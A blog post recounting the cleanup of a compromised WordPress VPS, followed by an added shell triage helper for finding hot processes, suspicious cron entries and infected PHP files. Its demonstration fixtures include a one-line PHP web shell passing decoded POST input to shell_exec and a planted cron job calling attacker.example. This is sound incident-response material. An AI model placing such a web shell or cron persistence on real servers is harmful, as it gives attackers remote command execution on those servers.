Recently I have been having internet problems at home, so alarm bells didn’t immediately start to ring when a number of websites on a small VPS that I look after for a colleague started loading extremely slowly.
Eventually I noticed that other websites at this time were going pretty quick and it was just the ones on this particular VPS that were crawling along.
Firstly I restarted Apache and then MySQL; however, things didn't improve. Eventually I rebooted the server completely and things sped up – for a while.
Unfortunately, within an hour things slowed down again, and I noticed one process was consuming massive amounts of CPU, leaving very little for anything else.
The process was /usr/bin/host.
After doing a little research I began to realize that it was possible the VPS had been compromised so I killed the process, which sped things up once again, temporarily.
I knew that something must be restarting the CPU-eating process and suspected a cron job, so I logged in via PuTTY and checked out the cron jobs.
Unfortunately I couldn’t see anything that looked too suspicious so headed back to Google.
Eventually I came across this article and it helped me greatly, mainly the part where it shows you how to search through all your files, and highlight which ones included the text /usr/bin/host. So that is what I did.
grep -ril --include='*.php' "/usr/bin/host" /
The files that showed up indeed appeared to be infected, looking at the code it appeared to be unpacking and installing malware.
I then installed and ran Maldet which found another 16 or so infected files and then cleaned or quarantined what it found.
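The steps above (find the CPU-hungry process and its parent, look at cron, grep the web files for the indicator string) can be scripted so they are repeatable the next time this happens. The following POSIX shell helper is an added example written for this post; it is not the author's script nor part of maldet. It checks every crontab location, not just the one user's crontab that `crontab -l` shows, because persistence for a web-shell process is frequently planted in the web server user's crontab (e.g. www-data) or in /etc/cron.d where a quick look can miss it. The sample site tree it builds under a temporary directory is constructed here purely to demonstrate the functions; the indicator string and the paths it scans are assumptions, not findings from the original incident.

```shell
#!/bin/sh
# Added triage helper for a "/usr/bin/host is eating the CPU" style incident.
# Not from the original post; the sample data below is constructed for demonstration.
set -u

# Indicator of compromise: the string the post found inside infected PHP files.
IOC='/usr/bin/host'

# 1. Which processes are hot, and who is their parent? The PPID is what tells
#    you whether cron, apache (a web shell) or something else keeps relaunching it.
top_cpu_with_parent() {
    # GNU ps (Linux). Shows the top N (default 5) by CPU with parent PID.
    ps -eo pid,ppid,user,pcpu,comm --sort=-pcpu | head -n "$((${1:-5} + 1))"
}

# 2. Print every active (non-comment) cron line under a root that mentions a
#    pattern. ROOT is normally "/" but can be a fake tree for testing.
#    Covers /etc/crontab, /etc/cron.d, and per-user spools on Debian and RHEL.
cron_entries_matching() {
    root="${1%/}"
    pattern="$2"
    for f in "$root"/etc/crontab "$root"/etc/cron.d/* \
             "$root"/var/spool/cron/crontabs/* "$root"/var/spool/cron/*; do
        [ -f "$f" ] || continue
        # Strip comments and blank lines, then keep lines containing the pattern.
        grep -v '^[[:space:]]*#' "$f" | grep -v '^[[:space:]]*$' \
            | grep -F -- "$pattern" | sed "s|^|$f: |"
    done
}

# 3. List PHP files under DIR containing the IoC (fixed-string match, sorted).
#    The glob is quoted so the shell does not expand it before grep sees it.
find_infected_php() {
    grep -rlF --include='*.php' -- "$IOC" "$1" 2>/dev/null | sort
}

count_infected_php() {
    find_infected_php "$1" | wc -l | tr -d ' '
}

# Constructed sample data (assumption, for demonstration only): a fake web root
# with one backdoored plugin file, and a fake system root with a planted cron job.
make_sample_site() {
    base="$1"
    mkdir -p "$base/wp-content/plugins/example" "$base/wp-content/uploads"
    printf '<?php echo "hello"; ?>\n' > "$base/index.php"
    printf '<?php $c = base64_decode($_POST["x"]); shell_exec("%s " . $c); ?>\n' \
        "$IOC" > "$base/wp-content/plugins/example/cache.php"
    printf '<?php /* clean upload handler */ ?>\n' > "$base/wp-content/uploads/img.php"
    printf 'note: %s was seen in ps output\n' "$IOC" > "$base/notes.txt"  # not .php
}

make_sample_root() {
    root="$1"
    mkdir -p "$root/etc/cron.d" "$root/var/spool/cron/crontabs"
    printf '# system crontab\n17 * * * * root run-parts /etc/cron.hourly\n' > "$root/etc/crontab"
    printf '# planted persistence\n*/5 * * * * www-data %s -t A attacker.example >/dev/null 2>&1\n' \
        "$IOC" > "$root/etc/cron.d/sysupdate"
    printf '0 3 * * * /usr/bin/backup.sh\n' > "$root/var/spool/cron/crontabs/root"
}

# Usage on a live box:
#   top_cpu_with_parent 10
#   cron_entries_matching / /usr/bin/host
#   find_infected_php /var/www
```

On a real server the two things to read together are the PPID column from `top_cpu_with_parent` and the output of `cron_entries_matching /`: a parent of `cron` points at a planted job, while a parent of an apache worker means a web shell is spawning it on each request and the infected PHP files are the thing to clean.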
The problem has gone away for now. I advised my colleague to update all their WordPress plugins, themes, etc., and changed passwords.
It’s only a matter of time before another attack hits, however for now everything is back to normal.